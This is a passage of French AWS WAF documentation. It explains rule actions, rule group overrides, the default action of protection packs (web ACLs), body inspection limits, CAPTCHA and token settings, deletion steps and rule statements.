Si l'évaluation des règles n'entraîne aucune action de résiliation, AWS WAF applique l'action par défaut du pack de protection (ACL Web) à la demande. Pour plus d'informations, consultez [Configuration de l'action par défaut du pack de protection (ACL Web) dans AWS WAF](web-acl-default-action.md).

Dans votre pack de protection (ACL Web), vous pouvez remplacer les paramètres d'action des règles au sein d'un groupe de règles et vous pouvez annuler l'action renvoyée par un groupe de règles. Pour plus d'informations, consultez [Remplacer les actions du groupe de règles dans AWS WAF](web-acl-rule-group-override-options.md). 

**Interaction entre les actions et les paramètres de priorité**  
Les actions qui AWS WAF s'appliquent à une requête Web sont affectées par les paramètres de priorité numérique des règles du pack de protection (ACL Web). Supposons, par exemple, que votre pack de protection (ACL Web) comporte une règle comportant une Allow action et une priorité numérique de 50 et une autre règle comportant une Count action et une priorité numérique de 100. AWS WAF évalue les règles d'un pack de protection (ACL Web) dans l'ordre de leur priorité, en commençant par le paramètre le plus bas, afin d'évaluer la règle d'autorisation avant la règle de décompte. Une requête Web qui correspond aux deux règles correspondra d'abord à la règle d'autorisation. Comme Allow il s'agit d'une action terminale, elle AWS WAF arrêtera l'évaluation à cette correspondance et n'évaluera pas la demande par rapport à la règle du décompte. 
+ Si vous souhaitez uniquement inclure les demandes qui ne correspondent pas à la règle d'autorisation dans les statistiques de vos règles de comptage, les paramètres de priorité des règles fonctionneront. 
+ D'autre part, si vous souhaitez que les mesures de comptage soient issues de la règle de comptage, même pour les demandes correspondant à la règle d'autorisation, vous devez attribuer à la règle de comptage un paramètre de priorité numérique inférieur à celui de la règle d'autorisation, afin qu'elle s'exécute en premier. 

Pour plus d'informations sur les paramètres de priorité, consultez[Définition de la priorité des règles](web-acl-processing-order.md). 

# Remplacer les actions du groupe de règles dans AWS WAF
<a name="web-acl-rule-group-override-options"></a>

Cette section explique comment annuler les actions des groupes de règles.

Lorsque vous ajoutez un groupe de règles à votre pack de protection (ACL Web), vous pouvez annuler les actions qu'il effectue sur les requêtes Web correspondantes. Le fait de remplacer les actions d'un groupe de règles dans la configuration de votre pack de protection (ACL Web) ne modifie pas le groupe de règles lui-même. Cela modifie uniquement la manière dont le groupe de règles est AWS WAF utilisé dans le contexte du pack de protection (ACL Web). 

## Les actions des règles du groupe de règles remplacent les actions
<a name="web-acl-rule-group-override-options-rules"></a>

Vous pouvez remplacer les actions des règles au sein d'un groupe de règles par n'importe quelle action de règle valide. Dans ce cas, les demandes correspondantes sont traitées exactement comme si l'action de la règle configurée était le paramètre de remplacement. 

**Note**  
Les actions relatives aux règles peuvent être terminales ou non. Une action d'arrêt arrête l'évaluation de la demande par le pack de protection (ACL Web) et la laisse continuer vers votre application protégée ou la bloque. 

Voici les options d'action de la règle : 
+ **Allow**— AWS WAF permet à la demande d'être transmise à la AWS ressource protégée pour traitement et réponse. Il s'agit d'une action terminale. Dans les règles que vous définissez, vous pouvez insérer des en-têtes personnalisés dans la demande avant de la transmettre à la ressource protégée.
+ **Block**— AWS WAF bloque la demande. Il s'agit d'une action terminale. Par défaut, votre AWS ressource protégée répond par un code d'`403 (Forbidden)`état HTTP. Dans les règles que vous définissez, vous pouvez personnaliser la réponse. En cas de AWS WAF blocage d'une demande, les paramètres Block d'action déterminent la réponse que la ressource protégée renvoie au client. 
+ **Count**— AWS WAF compte la demande mais ne détermine pas s'il faut l'autoriser ou la bloquer. Il s'agit d'une action sans fin. AWS WAF poursuit le traitement des règles restantes du pack de protection (ACL Web). Dans les règles que vous définissez, vous pouvez insérer des en-têtes personnalisés dans la demande et ajouter des libellés auxquels d'autres règles peuvent correspondre.
+ **CAPTCHAet Challenge** — AWS WAF utilise des puzzles CAPTCHA et des défis silencieux pour vérifier que la demande ne provient pas d'un bot, et AWS WAF utilise des jetons pour suivre les récentes réponses positives des clients. 

  Les puzzles CAPTCHA et les défis silencieux ne peuvent être exécutés que lorsque les navigateurs accèdent à des points de terminaison HTTPS. Les clients du navigateur doivent fonctionner dans des contextes sécurisés pour acquérir des jetons. 
**Note**  
Des frais supplémentaires vous sont facturés lorsque vous utilisez l'action CAPTCHA ou la Challenge règle dans l'une de vos règles ou en tant que dérogation d'action de règle dans un groupe de règles. Pour plus d’informations, consultez [Tarification d’AWS WAF](https://aws.amazon.com/waf/pricing/).

  Ces actions de règles peuvent être terminales ou non, selon l'état du jeton dans la demande : 
  + **Non résiliable pour un jeton valide et non expiré : si le jeton** est valide et non expiré conformément au CAPTCHA configuré ou à la durée d'immunité au défi, AWS WAF gère la demande de la même manière que l'action. Count AWS WAF continue d'inspecter la requête Web en fonction des règles restantes du pack de protection (ACL Web). Comme pour la Count configuration, dans les règles que vous définissez, vous pouvez éventuellement configurer ces actions avec des en-têtes personnalisés à insérer dans la demande, et vous pouvez ajouter des étiquettes auxquelles d'autres règles peuvent correspondre. 
  + **Terminer par une demande bloquée pour un jeton non valide ou expiré** — Si le jeton n'est pas valide ou si l'horodatage indiqué est expiré, AWS WAF met fin à l'inspection de la requête Web et bloque la demande, comme dans le cas de l'action. Block AWS WAF répond ensuite au client avec un code de réponse personnalisé. En CAPTCHA effet, si le contenu de la demande indique que le navigateur client peut la gérer, AWS WAF envoie un casse-tête CAPTCHA dans un JavaScript interstitiel, conçu pour distinguer les clients humains des robots. Pour l'Challengeaction, AWS WAF envoie un JavaScript interstitiel avec un défi silencieux conçu pour distinguer les navigateurs normaux des sessions exécutées par des robots. 

  Pour plus d’informations, consultez [CAPTCHAet Challenge dans AWS WAF](waf-captcha-and-challenge.md).

Pour plus d'informations sur l'utilisation de cette option, consultez[Remplacer les actions des règles dans un groupe de règles](web-acl-rule-group-settings.md#web-acl-rule-group-rule-action-override).

### Remplacer l'action de la règle par Count
<a name="web-acl-rule-group-override-to-count"></a>

Le cas d'utilisation le plus courant des dérogations aux actions des règles est le remplacement de certaines ou de toutes les actions des règles afin Count de tester et de surveiller le comportement d'un groupe de règles avant de le mettre en production. 

Vous pouvez également l'utiliser pour résoudre les problèmes liés à un groupe de règles qui génère des faux positifs. Les faux positifs se produisent lorsqu'un groupe de règles bloque le trafic que vous ne vous attendez pas à ce qu'il bloque. Si vous identifiez une règle au sein d'un groupe de règles susceptible de bloquer les demandes que vous souhaitez autoriser, vous pouvez maintenir le nombre d'actions annulées sur cette règle, afin de l'empêcher de donner suite à vos demandes.

Pour plus d'informations sur l'utilisation du remplacement des actions des règles dans le cadre des tests, consultez[Tester et ajuster vos AWS WAF protections](web-acl-testing.md).

### Liste JSON : `RuleActionOverrides` remplace `ExcludedRules`
<a name="web-acl-rule-group-override-replaces-exclude"></a>

Si vous avez défini les actions des règles de groupe de règles sur Count dans la configuration de votre pack de protection (ACL Web) avant le 27 octobre 2022, vous AWS WAF avez enregistré vos dérogations dans le code JSON du pack de protection (ACL Web) sous `ExcludedRules` le nom de. Désormais, le paramètre JSON permettant de remplacer une règle se Count trouve dans les `RuleActionOverrides` paramètres. 

Nous vous recommandons de mettre à jour tous les `ExcludedRules` paramètres de vos listes JSON vers des `RuleActionOverrides` paramètres dont l'action est définie surCount. L'API accepte l'un ou l'autre paramètre, mais vous obtiendrez une cohérence dans vos listes JSON, entre votre travail sur console et votre travail sur API, si vous utilisez uniquement le nouveau `RuleActionOverrides` paramètre. 

**Note**  
Dans la AWS WAF console, l'onglet **Demandes échantillonnées** du pack de protection (ACL Web) n'affiche aucun exemple de règles utilisant l'ancien paramètre. Pour de plus amples informations, veuillez consulter [Affichage d'un exemple de demandes web](web-acl-testing-view-sample.md). 

Lorsque vous utilisez la AWS WAF console pour modifier les paramètres du groupe de règles existant, la console convertit automatiquement tous `ExcludedRules` les paramètres du JSON en `RuleActionOverrides` paramètres, l'action de remplacement étant définie sur. Count 
+ Exemple de réglage actuel : 

  ```
         "ManagedRuleGroupStatement": {
            "VendorName": "AWS",
            "Name": "AWSManagedRulesAdminProtectionRuleSet",
            "RuleActionOverrides": [
              {
                "Name": "AdminProtection_URIPATH",
                "ActionToUse": {
                  "Count": {}
                }
              }
            ]
  ```
+ Ancien exemple de réglage : 

  ```
  OLD SETTING
         "ManagedRuleGroupStatement": {
            "VendorName": "AWS",
            "Name": "AWSManagedRulesAdminProtectionRuleSet",
            "ExcludedRules": [
              {
                "Name": "AdminProtection_URIPATH"
              }
            ]
  OLD SETTING
  ```

## L'action de retour du groupe de règles est remplacée par Count
<a name="web-acl-rule-group-override-options-rule-group"></a>

Vous pouvez annuler l'action renvoyée par le groupe de règles en lui attribuant la valeur. Count 

**Note**  
Il ne s'agit pas d'une bonne option pour tester les règles d'un groupe de règles, car elle ne modifie pas la façon dont le groupe AWS WAF de règles est évalué lui-même. Cela n'affecte que le mode AWS WAF de gestion des résultats renvoyés au pack de protection (ACL Web) à la suite de l'évaluation du groupe de règles. Si vous souhaitez tester les règles dans un groupe de règles, utilisez l'option décrite dans la section précédente,[Les actions des règles du groupe de règles remplacent les actions](#web-acl-rule-group-override-options-rules).

Lorsque vous remplacez l'action du groupe de règles parCount, AWS WAF traite l'évaluation du groupe de règles normalement. 

Si aucune règle du groupe de règles ne correspond ou si toutes les règles correspondantes comportent une Count action, cette dérogation n'a aucun effet sur le traitement du groupe de règles ou du pack de protection (ACL Web).

La première règle du groupe de règles qui correspond à une requête Web et qui comporte une action de fin de règle entraîne AWS WAF l'arrêt de l'évaluation du groupe de règles et renvoie le résultat de l'action de fin au niveau d'évaluation du pack de protection (ACL Web). À ce stade, lors de l'évaluation du pack de protection (ACL Web), cette dérogation prend effet. AWS WAF remplace l'action finale afin que le résultat de l'évaluation du groupe de règles ne soit qu'une Count action. AWS WAF poursuit ensuite le traitement du reste des règles du pack de protection (ACL Web).

Pour plus d'informations sur l'utilisation de cette option, consultez[Remplacer le résultat de l'évaluation d'un groupe de règles par Count](web-acl-rule-group-settings.md#web-acl-rule-group-action-override).

# Configuration de l'action par défaut du pack de protection (ACL Web) dans AWS WAF
<a name="web-acl-default-action"></a>

Cette section explique le fonctionnement des actions par défaut du pack de protection (ACL Web).

Lorsque vous créez et configurez un pack de protection (ACL Web), vous devez définir l'action par défaut du pack de protection (ACL Web). AWS WAF applique cette action à toute requête Web qui passe par toutes les évaluations de règles du pack de protection (ACL Web) sans qu'une action de fin ne lui soit appliquée. Une action d'arrêt arrête l'évaluation de la demande par le pack de protection (ACL Web) et la laisse continuer vers votre application protégée ou la bloque. Pour plus d'informations sur les actions relatives aux règles, consultez[Utilisation des actions liées aux règles dans AWS WAF](waf-rule-action.md).

L'action par défaut du pack de protection (ACL Web) doit déterminer la disposition finale de la requête Web. Il s'agit donc d'une action terminale : 
+ **Allow**— Si vous souhaitez autoriser la plupart des utilisateurs à accéder à votre site Web, mais que vous souhaitez bloquer l'accès aux attaquants dont les demandes proviennent d'adresses IP spécifiées, ou dont les demandes semblent contenir du code SQL malveillant ou des valeurs spécifiques, choisissez Allow l'action par défaut. Ensuite, lorsque vous ajoutez des règles à votre pack de protection (ACL Web), ajoutez des règles qui identifient et bloquent les demandes spécifiques que vous souhaitez bloquer. Avec cette action, vous pouvez insérer des en-têtes personnalisés dans la demande avant de la transmettre à la ressource protégée.
+ **Block**— Si vous souhaitez empêcher la plupart des utilisateurs d'accéder à votre site Web, mais que vous souhaitez autoriser l'accès aux utilisateurs dont les demandes proviennent d'adresses IP spécifiées ou dont les demandes contiennent des valeurs spécifiées, choisissez Block l'action par défaut. Ensuite, lorsque vous ajoutez des règles à votre pack de protection (ACL Web), ajoutez des règles qui identifient et autorisent les demandes spécifiques que vous souhaitez autoriser. Par défaut, pour l'Blockaction, la AWS ressource répond par un code d'`403 (Forbidden)`état HTTP, mais vous pouvez personnaliser la réponse. 

Pour plus d'informations sur la personnalisation des demandes et des réponses, consultez[Demandes et réponses Web personnalisées dans AWS WAF](waf-custom-request-response.md).

La configuration de vos propres règles et groupes de règles dépend en partie de l'autorisation ou du blocage de la plupart des demandes web. Par exemple, si vous souhaitez *autoriser* la plupart des demandes, vous devez définir l'action par défaut du pack de protection (ACL Web) surAllow, puis ajouter des règles identifiant les demandes Web que vous souhaitez *bloquer*, telles que les suivantes :
+ Les requêtes provenant d'adresses IP qui effectuent un trop grand nombre de requêtes
+ Demandes en provenance de pays dans lesquels vous n'avez pas d'activité ou qui sont la source d'attaques fréquentes
+ Les requêtes qui incluent des valeurs fausses dans l'en-tête `User-agent`
+ Les requêtes qui semblent inclure du code SQL malveillant

Les règles des groupes de règles gérés utilisent généralement l'Blockaction, mais ce n'est pas le cas de toutes. Par exemple, certaines règles utilisées pour le contrôle des robots utilisent les paramètres Challenge d'action CAPTCHA et. Pour de plus amples informations sur les groupes de règles gérées, reportez-vous à la section [Utilisation de groupes de règles gérés dans AWS WAF](waf-managed-rule-groups.md).

# Considérations relatives à la gestion de l'inspection corporelle dans AWS WAF
<a name="web-acl-setting-body-inspection-limit"></a>

La limite de taille d'inspection de la carrosserie est la taille maximale demandée AWS WAF pouvant être inspectée. Lorsque le corps d'une requête Web est supérieur à la limite, le service hôte sous-jacent ne transmet que le contenu se situant dans la limite à des AWS WAF fins d'inspection. 
+ Pour Application Load Balancer et AWS AppSync, la limite est fixée à 8 Ko (8 192 octets).
+ Pour API Gateway CloudFront, Amazon Cognito, App Runner et Verified Access, la limite par défaut est de 16 Ko (16 384 octets), et vous pouvez augmenter la limite pour tous les types de ressources par incréments de 16 Ko, jusqu'à 64 Ko. Les options de configuration sont 16 Ko, 32 Ko, 48 Ko et 64 Ko. 

**Important**  
AWS WAF ne prend pas en charge les règles d'inspection du corps de requête pour le trafic gRPC. Si vous avez activé ces règles dans le pack de protection (ACL Web) d'une CloudFront distribution ou d'un Application Load Balancer, toute demande utilisant gRPC ignorera les règles d'inspection du corps de la demande. Toutes les autres AWS WAF règles continueront de s'appliquer. Pour plus d'informations, consultez la section [Activer AWS WAF pour les distributions](https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/WAF-one-click.html) dans le manuel *Amazon CloudFront Developer Guide*. 

**Manipulation de carrosseries surdimensionnées**  
Si votre trafic Web inclut des corps dont la taille est supérieure à la limite, la gestion des surdimensionnements que vous avez configurée s'appliquera. Pour plus d'informations sur les options de gestion des surdimensionnements, consultez[Composants de requête Web surdimensionnés dans AWS WAF](waf-oversize-request-components.md). 

**Considérations relatives à la tarification pour augmenter le montant des limites**  
AWS WAF facture un tarif de base pour l'inspection du trafic qui se situe dans la limite par défaut pour le type de ressource. 

Pour les CloudFront ressources API Gateway, Amazon Cognito, App Runner et Verified Access, si vous augmentez le paramètre de limite, le trafic AWS WAF pouvant être inspecté inclut la taille corporelle jusqu'à votre nouvelle limite. Des frais supplémentaires vous sont facturés uniquement pour l'inspection des demandes dont la taille du corps est supérieure à la valeur par défaut de 16 Ko. Pour plus d’informations sur la tarification, consultez [Tarification d’AWS WAF](https://aws.amazon.com/waf/pricing/).

**Options pour modifier la limite de taille d'inspection de la carrosserie**  
Vous pouvez configurer la limite de taille d'inspection corporelle pour les CloudFront ressources API Gateway, Amazon Cognito, App Runner ou Verified Access. 

Lorsque vous créez ou modifiez un pack de protection (ACL Web), vous pouvez modifier les limites de taille d'inspection du corps dans la configuration de l'association de ressources. Pour l'API, consultez la configuration d'association du pack de protection (ACL Web) à l'adresse [AssociationConfig](https://docs.aws.amazon.com/waf/latest/APIReference/API_AssociationConfig.html). Pour la console, consultez la configuration sur la page où vous spécifiez les ressources associées au pack de protection (ACL Web). Pour obtenir des conseils sur la configuration de la console, consultez[Affichage des statistiques du trafic Web dans AWS WAF](web-acl-working-with.md). 

# Configuration du CAPTCHA, du défi et des jetons dans AWS WAF
<a name="web-acl-captcha-challenge-token-domains"></a>

Vous pouvez configurer des options dans votre pack de protection (ACL Web) pour les règles qui utilisent les actions de Challenge règles CAPTCHA ou pour l'intégration des applications SDKs qui gèrent les défis clients silencieux pour les protections AWS WAF gérées. 

Ces fonctionnalités atténuent l'activité des robots en lançant des puzzles CAPTCHA aux utilisateurs finaux et en proposant des défis silencieux aux sessions des clients. Lorsque le client répond avec succès, il AWS WAF fournit un jeton à utiliser dans sa demande Web, horodaté avec les dernières réponses au puzzle et au défi réussis. Pour de plus amples informations, veuillez consulter [Atténuation intelligente des menaces dans AWS WAF](waf-managed-protections.md).

Dans la configuration de votre pack de protection (ACL Web), vous pouvez configurer le mode de AWS WAF gestion de ces jetons : 
+ Durée du **CAPTCHA et de l'immunité aux défis : ces durées** indiquent la durée de validité d'un CAPTCHA ou d'un horodatage de défi. Les paramètres du pack de protection (ACL Web) sont hérités par toutes les règles qui ne disposent pas de leurs propres paramètres de durée d'immunité configurés, ainsi que par l'intégration de l'application SDKs. Pour de plus amples informations, veuillez consulter [Configuration de l'expiration de l'horodatage et de la durée d'immunité des jetons dans AWS WAF](waf-tokens-immunity-times.md).
+ **Domaines de jetons** : par défaut, AWS WAF accepte les jetons uniquement pour le domaine de la ressource à laquelle le pack de protection (ACL Web) est associé. Si vous configurez une liste de domaines de jetons, AWS WAF accepte les jetons pour tous les domaines de la liste et pour le domaine de la ressource associée. Pour de plus amples informations, veuillez consulter [AWS WAF configuration de la liste de domaines de jetons du pack de protection (ACL Web)](waf-tokens-domains.md#waf-tokens-domain-lists).

# Affichage des statistiques du trafic Web dans AWS WAF
<a name="web-acl-working-with"></a>

Cette section explique comment accéder aux résumés des statistiques du trafic Web.

Quel que soit le pack de protection (ACL Web) que vous utilisez, vous pouvez accéder aux résumés des mesures de trafic Web sur la page du pack de protection (ACL Web) de la AWS WAF console, sous l'onglet **Aperçu du trafic**. Les tableaux de bord de la console fournissent des résumés en temps quasi réel des CloudWatch métriques AWS WAF collectées par Amazon lors de l'évaluation du trafic Web de votre application. Pour plus d'informations sur les tableaux de bord, consultez[Tableaux de bord d'aperçu du trafic pour les packs de protection (Web ACLs)](web-acl-dashboards.md). Pour plus d'informations sur la surveillance du trafic de votre pack de protection (ACL Web), consultez[Surveillance et réglage de vos AWS WAF protections](web-acl-testing-activities.md).

# Supprimer un pack de protection (ACL Web)
<a name="web-acl-deleting"></a>

Cette section décrit les procédures de suppression des packs de protection (Web ACLs) via la AWS console. 

**Important**  
La suppression d'un pack de protection (ACL Web) est définitive et irréversible.

Pour supprimer un pack de protection (ACL Web), vous devez d'abord dissocier toutes les AWS ressources du pack de protection (ACL Web). Utilisez la procédure suivante.

------
#### [ Using the new console ]

1. Connectez-vous au nouveau AWS Management Console et ouvrez la AWS WAF console à l'adresse [https://console.aws.amazon.com/wafv2-pro.](https://console.aws.amazon.com/wafv2-pro) 

1. Dans le volet de navigation, sélectionnez **Resources & protection packs (web ACLs)**.

1. Sur la carte du pack de protection (ACL Web), cliquez sur le lien **Modifier** à côté de **Ressources** pour ouvrir le panneau **Gérer les ressources**.

1. Dans la section **Gérer les ressources** du groupe de règles, choisissez la ressource que vous souhaitez dissocier, puis choisissez **Dissocier**.
**Note**  
Vous devez dissocier une ressource à la fois. Ne choisissez pas plusieurs ressources. 

1. Sur la page de confirmation, tapez « dissocier », puis choisissez **Dissocier**. Répétez l'opération pour dissocier chaque ressource du pack de protection (ACL Web).

1. Choisissez le pack de protection (ACL Web) que vous souhaitez supprimer. La console permet de modifier la carte du pack de protection principal (ACL Web) et ouvre également un panneau latéral contenant des informations que vous pouvez modifier.

1. Dans le panneau de détails, choisissez l'icône de la corbeille.

1. Sur la page de confirmation, tapez « Supprimer », puis choisissez **Supprimer**.

------
#### [ Using the standard console ]

1. Connectez-vous à la AWS WAF console AWS Management Console et ouvrez-la sur [https://console.aws.amazon.com/wafv2/homev2](https://console.aws.amazon.com/wafv2/homev2). 

1. Dans le volet de navigation, sélectionnez **Web ACLs**.

1. Sélectionnez le nom de la liste ACL web que vous souhaitez supprimer. La console vous amène à la description de la liste ACL web, où vous pouvez la modifier.
**Note**  
Si vous ne voyez pas l'ACL Web que vous souhaitez supprimer, assurez-vous que la sélection de région dans la ACLs section Web est correcte. Tous les sites Web ACLs qui protègent les CloudFront distributions Amazon se trouvent dans **Global (CloudFront)**.

1. Dans l'onglet ** AWS Ressources associées**, pour chaque ressource associée, sélectionnez le bouton radio à côté du nom de la ressource, puis choisissez **Dissocier**. Cela dissocie le pack de protection (ACL Web) de vos AWS ressources. 

1. Dans le volet de navigation, sélectionnez **Web ACLs**.

1. Sélectionnez la case d'option en regard de la liste ACL web que vous supprimez, puis choisissez **Supprimer**.

------

# AWS WAF règles
<a name="waf-rules"></a>

Cette section explique ce qu'est une AWS WAF règle et comment elle fonctionne.

Une AWS WAF règle définit comment inspecter les requêtes Web HTTP (S) et les mesures à prendre pour traiter une demande lorsqu'elle répond aux critères d'inspection. Vous définissez des règles uniquement dans le contexte d'un groupe de règles ou d'un pack de protection (ACL Web). 

Les règles n'existent pas AWS WAF en elles-mêmes. Ce ne sont pas AWS des ressources, et elles n'ont pas de noms de ressources Amazon (ARNs). Vous pouvez accéder à une règle par son nom dans le groupe de règles ou le pack de protection (ACL Web) dans lequel elle est définie. Vous pouvez gérer les règles et les copier dans d'autres packs de protection (Web ACLs) à l'aide de la vue JSON du groupe de règles ou du pack de protection (ACL Web) qui contient la règle. Vous pouvez également les gérer via le générateur de règles de AWS WAF console, disponible pour les packs de protection (Web ACLs) et les groupes de règles.

**Nom de la règle**  
Chaque règle nécessite un nom. Évitez les noms commençant par `AWS` et ceux utilisés pour les groupes de règles ou les règles gérées pour vous par d'autres services. Consultez [Reconnaissance des groupes de règles fournis par d'autres services](waf-service-owned-rule-groups.md). 

**Note**  
Si vous modifiez le nom d'une règle et que vous souhaitez que le nom de la métrique de la règle reflète le changement, vous devez également mettre à jour le nom de la métrique. AWS WAF ne met pas automatiquement à jour le nom de la métrique d'une règle lorsque vous modifiez le nom de la règle. Vous pouvez modifier le nom de la métrique lorsque vous modifiez la règle dans la console, à l'aide de l'éditeur JSON de règles. Vous pouvez également modifier les deux noms via APIs et dans toute liste JSON que vous utilisez pour définir votre pack de protection (ACL Web) ou votre groupe de règles.

**Déclaration de règle**  
Chaque règle nécessite également une déclaration de règle qui définit la manière dont la règle inspecte les requêtes Web. L'instruction de règle peut contenir d'autres instructions imbriquées à n'importe quelle profondeur, selon la règle et le type d'instruction. Certains énoncés de règles utilisent des ensembles de critères. Par exemple, vous pouvez spécifier jusqu'à 10 000 adresses IP ou plages d'adresses IP pour une règle de correspondance des ensembles d'adresses IP.

Vous pouvez définir des règles qui vérifient les critères suivants : 
+ Les scripts qui sont susceptibles d'être malveillants. Les pirates intègrent des scripts qui peuvent exploiter les vulnérabilités des applications web. Il s'agit de scripts inter-sites.
+ Les adresses IP ou les plages d'adresses IP d'où proviennent les requêtes.
+ Pays ou emplacement géographique d'où proviennent les demandes.
+ Longueur d'une partie spécifiée de la demande, telle que la chaîne de requête.
+ Le code SQL susceptible d'être malveillants. Les pirates essaient d'extraire les données de votre base de données en intégrant un code SQL malveillant dans une requête web. Cette opération s'appelle injection SQL.
+ Les chaînes qui apparaissent dans la requête, par exemple, les valeurs qui apparaissent dans l'en-tête `User-Agent` ou les chaînes de texte qui apparaissent dans la chaîne de requête. Vous pouvez également utiliser des expressions régulières (regex) pour spécifier ces chaînes.
+ Étiquettes que les règles précédentes du pack de protection (ACL Web) ont ajoutées à la demande.

Outre les instructions comportant des critères d'inspection des requêtes Web, comme ceux de la liste précédente, prennent AWS WAF en charge les instructions logiques pour `AND``OR`, et `NOT` que vous pouvez utiliser pour combiner des instructions dans une règle. 

Par exemple, sur la base des demandes récentes que vous avez reçues d'un attaquant, vous pouvez créer une règle avec une `AND` instruction logique qui combine les instructions imbriquées suivantes : 
+ Les requêtes proviennent de 192.0.2.44.
+ Elles contiennent la valeur `BadBot` dans l'en-tête `User-Agent`.
+ Elles semblent inclure du code de type SQL dans la chaîne de requête.

Dans ce cas, la requête Web doit correspondre à toutes les instructions pour obtenir une correspondance pour le niveau supérieur`AND`. 

**Topics**
+ [Utilisation des actions liées aux règles dans AWS WAF](waf-rule-action.md)
+ [Utilisation d'instructions de règle dans AWS WAF](waf-rule-statements.md)
+ [Utilisation des instructions de règles de correspondance dans AWS WAF](waf-rule-statements-match.md)
+ [Utilisation d'instructions de règles logiques dans AWS WAF](waf-rule-statements-logical.md)
+ [Utilisation d'instructions de règles basées sur le taux dans AWS WAF](waf-rule-statement-type-rate-based.md)
+ [Utilisation des déclarations de règles relatives aux groupes de règles dans AWS WAF](waf-rule-statements-rule-group.md)

# Utilisation des actions liées aux règles dans AWS WAF
<a name="waf-rule-action"></a>

Cette section explique le fonctionnement des actions relatives aux règles.

L'action de règle indique AWS WAF ce qu'il faut faire avec une requête Web lorsqu'elle correspond aux critères définis dans la règle. Vous pouvez éventuellement ajouter un comportement personnalisé à chaque action de règle. 

**Note**  
Les actions relatives aux règles peuvent être terminales ou non. Une action d'arrêt arrête l'évaluation de la demande par le pack de protection (ACL Web) et la laisse continuer vers votre application protégée ou la bloque. 

Voici les options d'action de la règle : 
+ **Allow**— AWS WAF permet à la demande d'être transmise à la AWS ressource protégée pour traitement et réponse. Il s'agit d'une action terminale. Dans les règles que vous définissez, vous pouvez insérer des en-têtes personnalisés dans la demande avant de la transmettre à la ressource protégée.
+ **Block**— AWS WAF bloque la demande. Il s'agit d'une action terminale. Par défaut, votre AWS ressource protégée répond par un code d'`403 (Forbidden)`état HTTP. Dans les règles que vous définissez, vous pouvez personnaliser la réponse. En cas de AWS WAF blocage d'une demande, les paramètres Block d'action déterminent la réponse que la ressource protégée renvoie au client. 
+ **Count**— AWS WAF compte la demande mais ne détermine pas s'il faut l'autoriser ou la bloquer. Il s'agit d'une action sans fin. AWS WAF poursuit le traitement des règles restantes du pack de protection (ACL Web). Dans les règles que vous définissez, vous pouvez insérer des en-têtes personnalisés dans la demande et ajouter des libellés auxquels d'autres règles peuvent correspondre.
+ **CAPTCHAet Challenge** — AWS WAF utilise des puzzles CAPTCHA et des défis silencieux pour vérifier que la demande ne provient pas d'un bot, et AWS WAF utilise des jetons pour suivre les récentes réponses positives des clients. 

  Les puzzles CAPTCHA et les défis silencieux ne peuvent être exécutés que lorsque les navigateurs accèdent à des points de terminaison HTTPS. Les clients du navigateur doivent fonctionner dans des contextes sécurisés pour acquérir des jetons. 
**Note**  
Des frais supplémentaires vous sont facturés lorsque vous utilisez l'action CAPTCHA ou la Challenge règle dans l'une de vos règles ou en tant que dérogation d'action de règle dans un groupe de règles. Pour plus d’informations, consultez [Tarification d’AWS WAF](https://aws.amazon.com/waf/pricing/).

  Ces actions de règles peuvent être terminales ou non, selon l'état du jeton dans la demande : 
  + **Non résiliable pour un jeton valide et non expiré : si le jeton** est valide et non expiré conformément au CAPTCHA configuré ou à la durée d'immunité au défi, AWS WAF gère la demande de la même manière que l'action. Count AWS WAF continue d'inspecter la requête Web en fonction des règles restantes du pack de protection (ACL Web). Comme pour la Count configuration, dans les règles que vous définissez, vous pouvez éventuellement configurer ces actions avec des en-têtes personnalisés à insérer dans la demande, et vous pouvez ajouter des étiquettes auxquelles d'autres règles peuvent correspondre. 
  + **Terminer par une demande bloquée pour un jeton non valide ou expiré** — Si le jeton n'est pas valide ou si l'horodatage indiqué est expiré, AWS WAF met fin à l'inspection de la requête Web et bloque la demande, comme dans le cas de l'action. Block AWS WAF répond ensuite au client avec un code de réponse personnalisé. En CAPTCHA effet, si le contenu de la demande indique que le navigateur client peut la gérer, AWS WAF envoie un casse-tête CAPTCHA dans un JavaScript interstitiel, conçu pour distinguer les clients humains des robots. Pour l'Challengeaction, AWS WAF envoie un JavaScript interstitiel avec un défi silencieux conçu pour distinguer les navigateurs normaux des sessions exécutées par des robots. 

  Pour plus d’informations, consultez [CAPTCHAet Challenge dans AWS WAF](waf-captcha-and-challenge.md).

Pour plus d'informations sur la personnalisation des demandes et des réponses, consultez[Demandes et réponses Web personnalisées dans AWS WAF](waf-custom-request-response.md).

Pour plus d'informations sur l'ajout d'étiquettes aux demandes correspondantes, consultez[Étiquetage des requêtes Web dans AWS WAF](waf-labels.md).

Pour plus d'informations sur la façon dont le pack de protection (ACL Web) et les paramètres des règles interagissent, consultez[Utilisation de packs de protection (Web ACLs) avec des règles et des groupes de règles dans AWS WAF](web-acl-processing.md). 

# Utilisation d'instructions de règle dans AWS WAF
<a name="waf-rule-statements"></a>

Cette section explique le fonctionnement des instructions de règles.

Les instructions de règle font partie d'une règle qui indique AWS WAF comment inspecter une requête Web. Lorsque AWS WAF les critères d'inspection sont trouvés dans une requête Web, nous disons que la requête Web correspond à la déclaration. Chaque instruction de règle spécifie ce qu'il faut rechercher et comment, selon le type d'instruction. 

Chaque règle AWS WAF contient une seule instruction de règle de niveau supérieur, qui peut contenir d'autres instructions. Les déclarations de règle peuvent être très simples. Par exemple, vous pouvez avoir une instruction fournissant un ensemble de pays d'origine pour lesquels inspecter vos requêtes Web ou vous pouvez avoir une déclaration de règle dans un pack de protection (ACL Web) qui fait simplement référence à un groupe de règles. Les instructions de règle peuvent également être très complexes. Par exemple, vous pouvez avoir une instruction qui combine de nombreuses autres instructions avec des NOT instructions logiques ANDOR, et. 

Pour la plupart des règles, vous pouvez ajouter un AWS WAF étiquetage personnalisé aux demandes correspondantes. Les règles des groupes de règles AWS gérées ajoutent des étiquettes aux demandes correspondantes. Les étiquettes ajoutées par une règle fournissent des informations sur la demande aux règles qui sont évaluées ultérieurement dans le pack de protection (ACL Web) ainsi que dans AWS WAF les journaux et les métriques. Pour plus d'informations sur l'étiquetage, reportez-vous [Étiquetage des requêtes Web dans AWS WAF](waf-labels.md) aux sections et[Déclaration relative à la règle de correspondance des étiquettes](waf-rule-statement-type-label-match.md).

**Instructions de règles d'imbrication**  
